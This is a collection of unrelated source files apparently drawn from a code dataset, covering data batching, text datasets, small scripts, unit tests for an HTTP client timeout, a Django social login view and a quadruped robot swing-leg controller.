{ed_idx}\")\n local_batch_input = input_data_list[st_idx: ed_idx]\n 
self.batch_data_list[batch_idx] = local_batch_input\n\n print('n_rows = %d, batch_size = %d, n_batch = %d.' % (self.n_rows, self.batch_size, self.n_batch))\n\n def create_batches(self, data):\n # sort by dialog turns\n sorted_data = sorted(data, key=lambda x: x['turns'], reverse=True)\n\n conv_ids = [sample['conv_id'] for sample in sorted_data]\n turns = [sample['turns'] for sample in sorted_data]\n kbts = [sample['kbt'] for sample in sorted_data]\n max_turn = max(turns)\n inputs = []\n for t in range(max_turn):\n turn_label = []\n turn_src = []\n turn_tgt = []\n turn_kb = []\n turn_kb_gt = []\n turn_entity = []\n turn_ptr = []\n turn_kb_ptr = []\n for sample in sorted_data:\n if sample['turns'] >= t+1:\n turn_label.append(t+1)\n turn_src.append(sample['src'][t][:bert_max_len])\n turn_tgt.append(sample['tgt'][t][:bert_max_len])\n turn_kb.append(sample['kb'][t][:bert_max_len])\n turn_kb_gt.append(sample['kb_gt'][t][:bert_max_len])\n\n turn_batch_size = len(turn_src)\n conv_id = conv_ids[:turn_batch_size]\n\n assert len(turn_tgt) == turn_batch_size\n if self.data_type == \"test\":\n turn_input = {\"conv_id\": conv_id,\"turn_label\": turn_label,\"src\": turn_src,\n \"tgt\": turn_tgt,\"kb\": turn_kb,\"kb_gt\": turn_kb_gt}\n else:\n turn_input = {\"conv_id\": conv_id, \"turn_label\": turn_label, \"src\": turn_src, \n \"tgt\": turn_tgt, \"kb\": turn_kb, \"kb_gt\": turn_kb_gt}\n inputs.append(turn_input)\n \n batch_data = {\"max_turn\": max_turn,\"inputs\": inputs, \"kbts\": kbts}\n '''for i in kbts:\n print('batcher kbt', i[:10])\n print('\\n')'''\n return batch_data\n\n\ndef create_turn_batch(data_list):\n \"\"\"\n create_turn_batch\n \"\"\"\n turn_batches = []\n for data_dict in data_list:\n batch = Pack()\n for key in data_dict.keys():\n if key in ['src', 'tgt', 'kb', 'kb_gt', 'ptr_index', 'kb_index']:\n batch[key] = list2tensor([x for x in data_dict[key]])\n else:\n batch[key] = data_dict[key]\n turn_batches.append(batch)\n return turn_batches\n\ndef create_kb_batch(kb_list):\n \"\"\"\n create_kb_batch\n \"\"\"\n new_kb_list = []\n for i in kb_list:\n kbt = []\n for j in i:\n if len(j) == 6:\n del j[2]\n elif len(j) == 7:\n #print(j)\n del j[2:4]\n if len(j) == 5:\n kbt.append(j)\n new_kb_list.append(kbt)\n kb_batches = list2tensor(new_kb_list)\n #print(kb_batches)\n return kb_batches","repo_name":"deekshaVarshney/CNTF","sub_path":"source/inputter/batcher.py","file_name":"batcher.py","file_ext":"py","file_size_in_byte":4683,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"72940696872","text":"import re\nimport torch\nimport random\nimport numpy as np\nimport unidecode as ud\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset\n\n\nclass Mobydick(Dataset):\n\n def __init__(self, file_path, min_len=4, transform=None):\n\n # Load data\n with open(file_path, 'r') as file:\n text = file.read()\n\n ## Text preprocessing\n # Remove non-unicode characters\n text = ud.unidecode(text)\n # Lowarcase\n text = text.lower()\n # Remove single newlines\n text = re.sub(r'(?= min_len:\n # Substitute entire sentence with splited one\n sentences_clean.append(tokens)\n # Save words\n words.extend(tokens)\n\n # Store words\n self.words = set(words)\n # Store sentences\n self.sentences = sentences_clean\n # Store sentences transformation pipeline\n self.transform = transform\n\n def __len__(self):\n\n return len(self.sentences)\n\n def __getitem__(self, i):\n\n # Case index i is greater or equal than number of sequences\n if i >= 
len(self.sentences):\n # Raise key error\n raise IndexError('Chosen index exceeds sentences indices')\n\n # Case transform is not set\n if self.transform is None:\n # Just return i-th sentence\n return self.sentences[i]\n\n # Otherwise, transform it and return transformation result\n return self.transform(self.sentences[i])\n\n\nclass Bible(Dataset):\n\n def __init__(self, file_path, min_len=4, transform=None):\n\n # Load data\n with open(file_path, 'r') as file:\n text = file.read()\n\n ## Text preprocessing\n # Remove non-unicode characters\n text = ud.unidecode(text)\n # Lowercase\n text = text.lower()\n # Remove single newlines\n text = re.sub(r'(?= min_len:\n # Substitute entire sentence with splited one\n sentences_clean.append(tokens)\n # Save words\n words.extend(tokens)\n\n # Store words\n self.words = set(words)\n # Store sentences\n self.sentences = sentences_clean\n # Store sentences transformation pipeline\n self.transform = transform\n\n def __len__(self):\n\n return len(self.sentences)\n\n def __getitem__(self, i):\n\n # Case index i is greater or equal than number of sequences\n if i >= len(self.sentences):\n # Raise key error\n raise IndexError('Chosen index exceeds sentences indices')\n\n # Case transform is not set\n if self.transform is None:\n # Just return i-th sentence\n return self.sentences[i]\n\n # Otherwise, transform it and return transformation result\n return self.transform(self.sentences[i])\n\n\ndef split_train_test(dataset, train_prc=0.8):\n\n # Define dataset length\n n = len(dataset)\n # Define number of training dataset indices\n m = round(train_prc * n)\n # Split datasets in two\n return torch.utils.data.random_split(dataset, [m, n - m])\n\nclass OneHotEncode(object):\n\n def __init__(self, words):\n # Store list of words\n self.words = set(words)\n # Define mapping from words to integers\n self.encoder = {e: i for i, e in enumerate(words)}\n # Define mapping from integers to words\n self.decoder = {i: e for i, e in enumerate(words)}\n\n def __call__(self, sentence):\n # For each word in sentence, map it to vector\n encoded = [\n # Make a vector: set 1 only where index is equal to word number, 0 otherwise\n [ int(i == word_index) for i in range(len(self.words)) ]\n # Loop on word indices\n for word_index in sentence\n ]\n # Return one hot encoded sentence\n return encoded\n\n def decode(self, sentence):\n \"\"\"\n Input: list of binary lists (one hot encodings)\n Output: list of words (strings)\n \"\"\"\n # Map each inner list into a word text\n words = [ self.decoder[np.argmax(ohe)] for ohe in sentence ]\n return words\n\n\n\nclass WordToIndex(object):\n\n def __init__(self, words):\n # Store list of words\n self.words = set(words)\n # Define mapping from words to integers\n self.encoder = {e: i for i, e in enumerate(words)}\n # Define mapping from integers to words\n self.decoder = {i: e for i, e in enumerate(words)}\n\n # Return word as its index\n def __call__(self, sentence):\n # Make list of labels from words\n labels = [self.encoder[w] for w in sentence if w in self.words]\n # Return list of labels\n return labels\n\n # Return vector of indices as its corresponding words\n def decode(self, sentence):\n # Make list of words from labels\n words = [self.decoder[i] for i in sentence if i in self.decoder.keys()]\n # retrun list of words\n return words\n\n\nclass RandomCrop(object):\n\n # Constructor\n def __init__(self, crop_len):\n # Store crop length\n self.crop_len = crop_len\n\n def __call__(self, sentence):\n\n # Check for compatibility of crop 
length with sentence length\n if len(sentence) < self.crop_len:\n # Raise new index error\n raise IndexError(' '.join([\n 'Error: given crop length is {:d}'.format(self.crop_len),\n 'while current sentence length is {:d}:'.format(len(sentence)),\n 'crop length must be smaller or equal than sentence length'\n ]))\n\n # Define start annd end index of crop window, at random\n i = random.randint(0, len(sentence) - self.crop_len)\n j = i + self.crop_len\n # Take a subset of coriginal sentence\n sentence = sentence[i:j]\n # Return subset\n return sentence\n\n\nclass ToTensor(object):\n\n def __call__(self, sentence):\n\n return torch.tensor(sentence).float()\n","repo_name":"liacov/homework3_nndl","sub_path":"modules/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":8012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24889842919","text":"from datetime import date, time\nimport datetime\n\nday_of_week = [\"Mon\", \"Tues\", \"Wed\", \"Thurs\", \"Fri\", \"Sat\", \"Sun\"]\n#initialize the dates\nnow = datetime.datetime.now()\ntoday = date.today()\n\n#Date in the month,day year\nLocalDate = today.strftime(\"%b-%d-%Y\")\n#Localtime Now\ntimenow = now.strftime(\"%I:%M %p\").lstrip('0')\n#Day of the Week\ndays = str(day_of_week[datetime.datetime.today().weekday()])\nDate_phil = LocalDate + \" \" + timenow + \" \" + days\nprint(Date_phil)\n","repo_name":"androidRollin/QR-Code-Attendance-Registry-System","sub_path":"DateandTime.py","file_name":"DateandTime.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42203732107","text":"\"\"\"\n https://leetcode-cn.com/problems/reorder-list/\n https://leetcode-cn.com/problems/reorder-list/solution/zhong-pai-lian-biao-by-leetcode-solution/\n \n 1.链表不能直接用下标访问,先遍历链表,将节点有顺序的放在list中,再利用双指针即可\n\"\"\"\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def reorderList(self, head: ListNode) -> None:\n \"\"\"\n Do not return anything, modify head in-place instead.\n \"\"\"\n if not head:\n return \n\n node_list = []\n node = head\n while node:\n node_list.append(node)\n node = node.next\n\n i, j = 0, len(node_list) - 1\n while i < j:\n tmp = node_list[i].next\n node_list[i].next = node_list[j]\n # 此时的i指向下一个节点\n i = i + 1\n # 若此时相遇则跳出\n if i == j:\n break\n node_list[j].next = tmp\n j = j - 1\n\n node_list[i].next = None\n","repo_name":"zhouyang412/myleetcode","sub_path":"链表数组/143. 重排链表.py","file_name":"143. 
重排链表.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11203884101","text":"dolar = 718.17\ncambio = input(\"Quieres convertir de CLP a Dólar [C] o de Dólar a CLP [D]?: \")\nif cambio.upper() == \"C\" or cambio.upper() == \"D\":\n if cambio.upper() == \"C\":\n moneda = input(\"Ingresa cantidad de CLP que quieres convertir a dólar: \")\n calculo = int(moneda) / dolar\n print(\"La cantidad ingresada en pesos chilenos ($\"+str(moneda)+\") equivale a $\"+str(round(calculo,2))+\" dólares\")\n elif cambio.upper() == \"D\":\n moneda = input(\"Ingresa cantidad de dólares que quieres convertir a CLP: \")\n calculo = float(moneda) * int(dolar)\n print(\"La cantidad ingresada en dólares ($\"+str(moneda)+\") equivale a $\"+str(round(calculo))+\" CLP\")\nelse:\n print(\"Has ingresado un dato incorrecto, vuelve a intentarlo\")","repo_name":"nicontrerasi/conversor","sub_path":"conversor.py","file_name":"conversor.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"140355259","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Проверка обработки таймаута на TCP-соединение.\n\nВ этом наборе тестов принимается, что боевой чёрный ящик *не* доступен с\nтестовой машины, а именно, все соединения с ним таймаутятся.\n\"\"\"\n\nimport socket\nimport time\nimport threading\nimport unittest\nimport six\n\nfrom six.moves import BaseHTTPServer, http_client\n\nimport blackbox\n\n\n# Делается две попытки доступа, поэтому реальный таймаут таков:\nTIMEOUT = 2 * blackbox.HTTP_TIMEOUT + 0.5\nUSER_IP = '127.0.0.1'\n\n\ndef start_server_with_retries(port, num_retries, timeout=None):\n \"\"\"Запускает мок-сервер, первые num_retries-1 возвращающий ошибку\n (если timeout == None) или возвращающий ответ с таймаутом.\n В последний раз ответ отдаётся без таймаута и без ошибки.\n\n Сервер будет слушать на 127.0.0.1 на порту `port`. 
Он ответит на\n `num_requests` запросов и завершится.\n \"\"\"\n class ServerThread(threading.Thread):\n def run(self):\n class MockHandler(BaseHTTPServer.BaseHTTPRequestHandler):\n request_count = 0\n\n def do(self):\n self.__class__.request_count = self.request_count + 1\n if self.__class__.request_count == num_retries:\n self.send_response(200)\n self.send_header(b'Content-Type', b'text/xml')\n self.end_headers()\n self.wfile.write(b'''\n \n 57614307\n 0\n test-test\n \n test.test\n \n ''')\n return\n if not timeout:\n self.send_response(500)\n else:\n time.sleep(timeout)\n\n do_GET = do_HEAD = do_POST = do_PUT = do_DELETE = do_OPTIONS \\\n = do_TRACE = do\n svr = BaseHTTPServer.HTTPServer(('127.0.0.1', port), MockHandler)\n for i in range(num_retries):\n svr.handle_request()\n\n ServerThread().start()\n time.sleep(0.1) # даём серверу время подняться\n def server_killer():\n # добиваем не до конца отработавшие сервера\n time.sleep(5)\n con = http_client.HTTPConnection('localhost', port)\n for _ in range(num_retries):\n try:\n con.request('GET', '')\n con.getresponse()\n except:\n return\n threading.Thread(target=server_killer).start()\n\n\nclass TestBlackboxTimeOut(unittest.TestCase):\n def test_connect_timeout(self):\n \"\"\"Таймаут при установке TCP-соединения.\"\"\"\n # Надеюсь никто не слушает этот порт :)\n blackbox.BLACKBOX_URL = 'http://127.0.0.1:12321/blackbox/'\n time1 = time.time()\n try:\n blackbox.userinfo('test', USER_IP)\n except blackbox.BlackboxError:\n\n import traceback\n print(traceback.print_exc())\n time2 = time.time()\n self.assertAlmostEqual(time2 - time1, blackbox.HTTP_TIMEOUT + 0.5, 0)\n except Exception as ex:\n self.fail('ожидали BlackboxError, получили %s' % ex)\n\n def test_read_timeout(self):\n \"\"\"Таймаут при чтении HTTP-ответа.\"\"\"\n sock = socket.socket()\n port = 8765\n if six.PY3:\n port = 8766\n sock.bind(('127.0.0.1', port))\n sock.listen(1)\n blackbox.BLACKBOX_URL = 'http://127.0.0.1:{}/blackbox/'.format(port)\n time1 = time.time()\n try:\n blackbox.userinfo('test', USER_IP)\n except blackbox.BlackboxError:\n time2 = time.time()\n self.assertAlmostEqual(time2 - time1, TIMEOUT, 0)\n except Exception as ex:\n self.fail('ожидали BlackboxError, получили %s' % ex)\n finally:\n sock.close()\n\n\nclass TestRetries(unittest.TestCase):\n def test_successfull_retry_error(self):\n \"\"\"Успешный повторный запрос, когда несколько первых запросов\n возвращают ошибки\"\"\"\n start_server_with_retries(8403, num_retries=3)\n b = blackbox.Blackbox(url='http://localhost:8403/', timeout=[0.5, 0.5, 0.5])\n info = b.userinfo('test-test', USER_IP, by_login=True)\n self.assertEqual(info['uid'], '57614307')\n\n def test_unsuccessfull_retry_error(self):\n \"\"\"Безуспешный повторный запрос, когда сервер возвращает ошибки\"\"\"\n start_server_with_retries(8404, num_retries=3)\n b = blackbox.Blackbox(url='http://localhost:8404/', timeout=[0.5, 0.5])\n self.assertRaises(blackbox.BlackboxError, b.userinfo, 'test-test',\n USER_IP, by_login=True)\n time.sleep(1)\n\n def test_successfull_retry_timeout(self):\n \"\"\"Успешный повторный запрос, когда сервер отвечает слишком медленно\"\"\"\n start_server_with_retries(8405, num_retries=3, timeout=1)\n b = blackbox.Blackbox(url='http://localhost:8405/', timeout=[0.5, 1, 1.5])\n info = b.userinfo('test-test', USER_IP, by_login=True)\n self.assertEqual(info['uid'], '57614307')\n\n start_server_with_retries(8406, num_retries=3, timeout=1)\n b = blackbox.Blackbox(url='http://localhost:8406/', timeout=1, retry_count=3)\n info = 
b.userinfo('test-test', USER_IP, by_login=True)\n self.assertEqual(info['uid'], '57614307')\n\n def test_unsuccessfull_retry_timeout(self):\n \"\"\"Безуспешный повторный запрос, когда сервер отвечает слишком медленно\"\"\"\n start_server_with_retries(8407, num_retries=4, timeout=1)\n b = blackbox.Blackbox(url='http://localhost:8407/', timeout=0.5, retry_count=3)\n self.assertRaises(blackbox.BlackboxError, b.userinfo, 'test-test',\n USER_IP, by_login=True)\n time.sleep(2)\n\n start_server_with_retries(8408, num_retries=3, timeout=1)\n b = blackbox.Blackbox(url='http://localhost:8408/', timeout=[0.5, 0.6])\n self.assertRaises(blackbox.BlackboxError, b.userinfo, 'test-test',\n USER_IP, by_login=True)\n time.sleep(2)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"library/tests/test_timeout.py","file_name":"test_timeout.py","file_ext":"py","file_size_in_byte":7365,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25064033778","text":"import kaggle\nfrom kaggle.api.kaggle_api_extended import KaggleApi\nimport os\n\n#checks if this folder exists\npath= r'C:\\Users\\RIDGE\\.kaggle'\nisExist = os.path.exists(path)\nif not isExist:\n os.makedirs(path)\n print(\".kaggle created in C:\\x5cUsers\\x5cRIDGE\\x5c\")\n \n\n#access the API\napi = KaggleApi()\napi.authenticate()\n\n#download dataset\napi.dataset_download_file('world-happiness-report-2023', 'WHR2023.csv')\n \n# test 2","repo_name":"RIDGE413/RIDGE413","sub_path":"Personal Projects/API testing/kaggle_happiness_data_api.py","file_name":"kaggle_happiness_data_api.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25276452497","text":"import argparse\nimport sys\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom pathlib import Path\n\nimport mdp.analysis.MdpData as mv\nfrom mdp.models.MdpV2 import MdpModelV2\nfrom mdp.models.MdpV3 import MdpModelV3\nfrom mdp.models.MdpV4 import MdpModelV4\n\n\ndef main(argv):\n parser = argparse.ArgumentParser(description=\"plot costs of following MDP instance optimal policy\")\n parser.add_argument(\"-m\", \"--version\", help=\"MDP model version\", type=int)\n parser.add_argument(\"-p\", \"--paramsfile\", help=\"txt file with version specific params dict\")\n parser.add_argument(\"-c\", \"--component\", help=\"see single cost component\")\n parser.add_argument(\"-a\", \"--policy\", help=\"txt file with policy as list\", default=None)\n parser.add_argument(\"-t\", \"--timerange\", help=\"see specific time range\", nargs=2, type=int, default=None)\n parser.add_argument(\"-v\", \"--techstage\", help=\"see single tech stage\", type=int, default=None)\n parser.add_argument(\"--save\", help=\"save plots as png files\", action='store_true')\n args = parser.parse_args()\n\n if int(args.version) < 2:\n print(\"error: plot_cost_component only supported for MDP V2 or higher.\")\n sys.exit(1)\n\n params_dir = Path(\"results/v{}/params\".format(args.version))\n pf = params_dir / \"p_v{}_{}.txt\".format(args.version, args.paramsfile)\n with open(pf, 'r') as paramsfile:\n params = eval(paramsfile.read())\n paramsfile.close()\n\n mdp_model = None\n if int(args.version) == 2:\n mdp_model = MdpModelV2()\n elif int(args.version) == 3:\n mdp_model = MdpModelV3()\n elif int(args.version) == 4:\n mdp_model = MdpModelV4()\n\n assert(mdp_model is not None)\n assert(mdp_model.param_names == 
list(params.keys()))\n mdp_fh = mdp_model.run_fh(params)\n\n if args.techstage is not None:\n if args.techstage < 0 or args.techstage >= mdp_fh.n_tech_stages:\n print(\"error: tech stage {} out of range: {}\".format(args.techstage, mdp_fh.n_tech_stages))\n sys.exit(2)\n\n if args.policy:\n policies_dir = Path(\"visuals/v{}/policies\".format(args.version))\n af = policies_dir / \"a_v{}_{}.txt\".format(args.version, args.policy)\n with open(af, 'r') as policyfile:\n arb_policy = eval(policyfile.read())\n policyfile.close()\n assert(len(arb_policy) == mdp_fh.n_years)\n policy_type = args.policy\n else:\n policy_type = \"optimal\"\n\n if args.techstage is not None:\n if args.policy:\n policy = mv.get_arb_policy_trajectory(arb_policy, args.techstage)\n else:\n policy = mv.get_opt_policy_trajectory(mdp_fh, args.techstage)\n v_str = str(args.techstage)\n else:\n policy = []\n for v in np.arange(mdp_fh.n_tech_stages):\n if args.policy:\n policy.append(mv.get_arb_policy_trajectory(arb_policy, v))\n else:\n policy.append(mv.get_opt_policy_trajectory(mdp_fh, v))\n v_str = \"all\"\n\n if args.timerange:\n t0, tN = args.timerange\n t0 = max(0, t0-1)\n if tN - t0 > mdp_fh.n_years:\n print(\"error: time range {}-{} out of range: {}\".format(t0, tN, mdp_fh.n_tech_stages))\n sys.exit(3)\n else:\n t0 = 0\n tN = mdp_fh.n_years\n\n np.set_printoptions(linewidth=300)\n visuals_dir = Path(\"visuals/v{}/plots\".format(args.version))\n\n fig_component = mv.cost_by_component_wrapper(mdp_fh, policy, policy_type, args.component, [t0, tN], v=args.techstage)\n\n if args.save:\n fig_component.savefig(visuals_dir / \"g_v{}_{}_{}_{}.png\".format(args.version, policy_type, args.component, paramsfile, v_str))\n plt.show()\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"taigereye/cs91r","sub_path":"mdp/plot_cost_component.py","file_name":"plot_cost_component.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28104387444","text":"from django.contrib.auth import login as django_login\n\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.authtoken.models import Token\n\nfrom .serializers import SocialSerializer\nfrom ..serializers import TokenSerializer\n\nfrom .utils import get_social_auth, get_user_by_email, create_user_social, create_social_auth\n\n\nclass SocialLoginView(GenericAPIView):\n\n permission_classes = (AllowAny,)\n allowed_methods = ('POST', 'OPTIONS', 'HEAD')\n serializer_class = SocialSerializer\n response_serializer_class = TokenSerializer\n\n def get_response(self, request, token, new):\n serializer = self.response_serializer_class(instance=token, context={'request': request})\n\n if new:\n response = Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n response = Response(serializer.data, status=status.HTTP_200_OK)\n\n return response\n\n def post(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n\n backend, access_token = serializer.get_data()\n social_data = backend.get_clean_data(access_token)\n social_auth = get_social_auth(social_data['uid'], backend.name)\n new = False\n\n if social_auth is None:\n user = get_user_by_email(social_data['email'])\n\n if user is None:\n user = create_user_social(social_data)\n new = True\n\n 
social_auth = create_social_auth(user, social_data['uid'], backend.name, social_data['avatar_url'])\n\n else:\n user = social_auth.user\n\n if user:\n django_login(request, user, backend='accounts.auth_backends.AuthenticationBackend')\n token, created = Token.objects.get_or_create(user=user)\n return self.get_response(request, token, new)\n\n return Response(status=status.HTTP_400_BAD_REQUEST)\n","repo_name":"favourch/coretabs-academy","sub_path":"src/api/accounts/social/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71391606632","text":"import collections\nimport sys\nimport copy\ninput = sys.stdin.readline\nn,m = map(int,input().strip().split())\n\nboarda = [list(map(int,input().strip().split())) for _ in range(n)]\ncheck = [[0]*m for _ in range(n)]\nnx = [0,1,0,-1]\nny = [1,0,-1,0]\n\ndef go(board):\n nextBoard = [[0]*m for _ in range(n)]\n for i in range(n):\n for j in range(m):\n if board[i][j] > 0:\n ctn = 0\n for k in range(4):\n dx,dy = i+nx[k],j+ny[k]\n if 0 <= dx < n and 0 <= dy < m and board[dx][dy] == 0 :\n ctn += 1\n nextBoard[i][j] = max(0,board[i][j]-ctn)\n return nextBoard\n\ndef bfs(board):\n count = 0\n bb = copy.deepcopy(board)\n for i in range(n):\n for j in range(m):\n \n if bb[i][j] > 0 and count == 0:\n st = collections.deque()\n st.append((i,j))\n bb[i][j] = -1\n while st :\n x,y = st.popleft()\n for k in range(4):\n dx,dy = x+nx[k],y+ny[k]\n if 0 <= dx < n and 0 <= dy < m and bb[dx][dy] > 0 :\n st.append((dx,dy))\n bb[dx][dy] = -1\n count += 1\n if bb[i][j] > 0 and count > 0 :\n return False\n return True\nccc = 0\nwhile bfs(boarda):\n boarda = go(boarda)\n if boarda == check :\n ccc = 0\n break\n ccc += 1\n\nprint(ccc)","repo_name":"jjmin9797/algorithm","sub_path":"20220901/2573.py","file_name":"2573.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40349014584","text":"\"\"\"The swing leg controller class.\"\"\"\n# from absl import logging\n\nimport copy\nimport math\nimport numpy as np\nfrom typing import Any, Mapping, Sequence, Tuple\n\nfrom src.robots.motors import MotorCommand\nfrom src.convex_mpc_controller import gait_generator as gait_generator_lib\n\n# The position correction coefficients in Raibert's formula.\n_KP = np.array([0.01, 0.01, 0.01]) * 0.\n# At the end of swing, we leave a small clearance to prevent unexpected foot\n# collision.\n_FOOT_CLEARANCE_M = 0.01\n\n\ndef _gen_parabola(phase: float, start: float, mid: float, end: float) -> float:\n \"\"\"Gets a point on a parabola y = a x^2 + b x + c.\n\n The Parabola is determined by three points (0, start), (0.5, mid), (1, end) in\n the plane.\n\n Args:\n phase: Normalized to [0, 1]. 
A point on the x-axis of the parabola.\n start: The y value at x == 0.\n mid: The y value at x == 0.5.\n end: The y value at x == 1.\n\n Returns:\n The y value at x == phase.\n \"\"\"\n mid_phase = 0.5\n delta_1 = mid - start\n delta_2 = end - start\n delta_3 = mid_phase**2 - mid_phase\n coef_a = (delta_1 - delta_2 * mid_phase) / delta_3\n coef_b = (delta_2 * mid_phase**2 - delta_1) / delta_3\n coef_c = start\n\n return coef_a * phase**2 + coef_b * phase + coef_c\n\n\ndef _gen_swing_foot_trajectory(input_phase: float, start_pos: Sequence[float],\n end_pos: Sequence[float],\n foot_height: float) -> Tuple[float]:\n \"\"\"Generates the swing trajectory using a parabola.\n\n Args:\n input_phase: the swing/stance phase value between [0, 1].\n start_pos: The foot's position at the beginning of swing cycle.\n end_pos: The foot's desired position at the end of swing cycle.\n\n Returns:\n The desired foot position at the current phase.\n \"\"\"\n # We augment the swing speed using the below formula. For the first half of\n # the swing cycle, the swing leg moves faster and finishes 80% of the full\n # swing trajectory. The rest 20% of trajectory takes another half swing\n # cycle. Intuitely, we want to move the swing foot quickly to the target\n # landing location and stay above the ground, in this way the control is more\n # robust to perturbations to the body that may cause the swing foot to drop\n # onto the ground earlier than expected. This is a common practice similar\n # to the MIT cheetah and Marc Raibert's original controllers.\n phase = input_phase\n if input_phase <= 0.5:\n phase = 0.8 * math.sin(input_phase * math.pi)\n else:\n phase = 0.8 + (input_phase - 0.5) * 0.4\n\n x = (1 - phase) * start_pos[0] + phase * end_pos[0]\n y = (1 - phase) * start_pos[1] + phase * end_pos[1]\n mid = max(end_pos[2], start_pos[2]) + foot_height\n z = _gen_parabola(phase, start_pos[2], mid, end_pos[2])\n\n # PyType detects the wrong return type here.\n return (x, y, z) # pytype: disable=bad-return-type\n\n\n# def cubic_bezier(x0: Sequence[float], x1: Sequence[float],\n# t: float) -> Sequence[float]:\n# progress = t**3 + 3 * t**2 * (1 - t)\n# return x0 + progress * (x1 - x0)\n\n# def _gen_swing_foot_trajectory(input_phase: float, start_pos: Sequence[float],\n# end_pos: Sequence[float]) -> Tuple[float]:\n# max_clearance = 0.10\n# mid_z = max(end_pos[2], start_pos[2]) + max_clearance\n# mid_pos = (start_pos + end_pos) / 2\n# mid_pos[2] = mid_z\n# if input_phase < 0.5:\n# t = input_phase * 2\n# foot_pos = cubic_bezier(start_pos, mid_pos, t)\n# else:\n# t = input_phase * 2 - 1\n# foot_pos = cubic_bezier(mid_pos, end_pos, t)\n# return foot_pos\n\n\nclass RaibertSwingLegController:\n \"\"\"Controls the swing leg position using Raibert's formula.\n\n For details, please refer to chapter 2 in \"Legged robbots that balance\" by\n Marc Raibert. The key idea is to stablize the swing foot's location based on\n the CoM moving speed.\n\n \"\"\"\n def __init__(self, robot: Any, gait_generator: Any, state_estimator: Any,\n desired_speed: Tuple[float,\n float], desired_twisting_speed: float,\n desired_height: float, foot_landing_clearance: float,\n foot_height: float, use_raibert_heuristic: bool):\n \"\"\"Initializes the class.\n\n Args:\n robot: A robot instance.\n gait_generator: Generates the stance/swing pattern.\n state_estimator: Estiamtes the CoM speeds.\n desired_speed: Behavior parameters. 
X-Y speed.\n desired_twisting_speed: Behavior control parameters.\n desired_height: Desired standing height.\n foot_landing_clearance: The foot clearance on the ground at the end of\n the swing cycle.\n \"\"\"\n self._robot = robot\n self._state_estimator = state_estimator\n self._gait_generator = gait_generator\n self._last_leg_state = gait_generator.desired_leg_state\n self.desired_speed = np.array((desired_speed[0], desired_speed[1], 0))\n self.desired_twisting_speed = desired_twisting_speed\n self._desired_height = desired_height\n self._desired_landing_height = np.array(\n (0, 0, desired_height - foot_landing_clearance))\n\n self._phase_switch_foot_local_position = None\n self.foot_placement_position = np.zeros(12)\n self.use_raibert_heuristic = use_raibert_heuristic\n self._foot_height = foot_height\n self.reset(0)\n\n def reset(self, current_time: float) -> None:\n \"\"\"Called during the start of a swing cycle.\n\n Args:\n current_time: The wall time in seconds.\n \"\"\"\n del current_time\n self._last_leg_state = self._gait_generator.desired_leg_state\n self._phase_switch_foot_local_position = \\\n self._robot.foot_positions_in_base_frame.copy()\n\n def update(self, current_time: float) -> None:\n \"\"\"Called at each control step.\n Args:\n current_time: The wall time in seconds.\n \"\"\"\n del current_time\n new_leg_state = self._gait_generator.desired_leg_state\n # Detects phase switch for each leg so we can remember the feet position at\n # the beginning of the swing phase.\n for leg_id, state in enumerate(new_leg_state):\n if (state == gait_generator_lib.LegState.SWING\n and state != self._last_leg_state[leg_id]):\n self._phase_switch_foot_local_position[leg_id] = (\n self._robot.foot_positions_in_base_frame[leg_id])\n\n self._last_leg_state = copy.deepcopy(new_leg_state)\n\n @property\n def foot_height(self):\n return self._foot_height\n\n @foot_height.setter\n def foot_height(self, foot_height: float) -> None:\n self._foot_height = foot_height\n\n @property\n def foot_landing_clearance(self):\n return self._desired_height - self._desired_landing_height[2]\n\n @foot_landing_clearance.setter\n def foot_landing_clearance(self, landing_clearance: float) -> None:\n self._desired_landing_height = np.array(\n (0., 0., self._desired_height - landing_clearance))\n\n def get_action(self) -> Mapping[Any, Any]:\n com_velocity = self._state_estimator.com_velocity_body_frame\n com_velocity = np.array((com_velocity[0], com_velocity[1], 0))\n\n _, _, yaw_dot = self._robot.base_angular_velocity_body_frame\n hip_positions = self._robot.swing_reference_positions\n\n all_joint_angles = {}\n for leg_id, leg_state in enumerate(self._gait_generator.leg_state):\n if leg_state in (gait_generator_lib.LegState.STANCE,\n gait_generator_lib.LegState.EARLY_CONTACT,\n gait_generator_lib.LegState.LOSE_CONTACT):\n continue\n\n # For now we did not consider the body pitch/roll and all calculation is\n # in the body frame. 
